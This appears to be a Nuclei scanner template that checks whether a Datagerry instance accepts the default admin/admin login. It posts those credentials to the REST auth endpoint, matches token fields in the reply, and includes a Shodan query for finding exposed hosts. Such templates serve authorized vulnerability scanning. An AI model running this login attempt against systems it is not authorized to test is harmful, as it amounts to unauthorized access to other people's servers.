id: datagerry-default-login

info:
  name: Datagerry - Default Login
  author: gy741
  severity: high
  description: |
    Datagerry was using default username and password was discovered.
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"datagerry"
  tags: datagerry,default-login

variables:
  username: "admin"
  password: "admin"

http:
  - raw:
      - |
        POST /rest/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"user_name":"{{username}}","password":"{{password}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"token":'
          - '"token_issued_at":'
          - '"token_expire":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220588384f97396dca5dd5f0011e2abcbfcbbcd8db55f3767df17c636bd58b90e5902210090a7249ac3c8794ecb9f134147128b6345af4c1dfc3225911b08b3be26f86bf4:922c64590222798bb761d5b6d8e72950